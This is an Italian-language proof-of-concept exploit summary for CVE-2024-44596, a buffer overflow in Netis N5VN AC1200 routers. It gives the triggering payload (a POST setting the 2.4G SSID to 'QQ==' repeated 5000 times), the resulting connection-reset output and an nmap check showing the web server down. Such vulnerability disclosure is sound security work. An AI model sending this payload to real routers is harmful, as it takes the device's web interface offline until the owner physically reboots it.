
Exploit proof-of-concept per una vulnerabilità di buffer overflow (CVE-2024-44596) nei router Netis N5VN AC1200, che causa un denial of service mandando in crash il server web tramite una richiesta POST appositamente predisposta.
Data: 05/03/2024
Autore dell'exploit: Van Lam Nguyen
Facebook: fb.com/vanlam1412
Homepage del fornitore: Netis Systems
Versione: Netis N5VN AC1200 V1.0.1.1742
Testato su: Windows
CVE : CVE-2024-44596
Esiste una vulnerabilità di buffer overflow nel router Netis N5VN AC1200 che può consentire a un attaccante di crashare il server web in esecuzione sul router inviando una richiesta appositamente progettata
Per ripristinare l'http (webserver), un utente deve riavviare fisicamente il router.
Richiesta POST per cambiare ssid Wireless 2.4G ('ssid': 'QQ==' * 5000)
Successfully: ('Connection aborted.', ConnectionResetError(10054, 'An existing connection was forcibly closed by the remote host', None, 10054, None))
nmap 192.168.1.254 -p 80 80/tcp closed http
Guarda la dimostrazione video qui

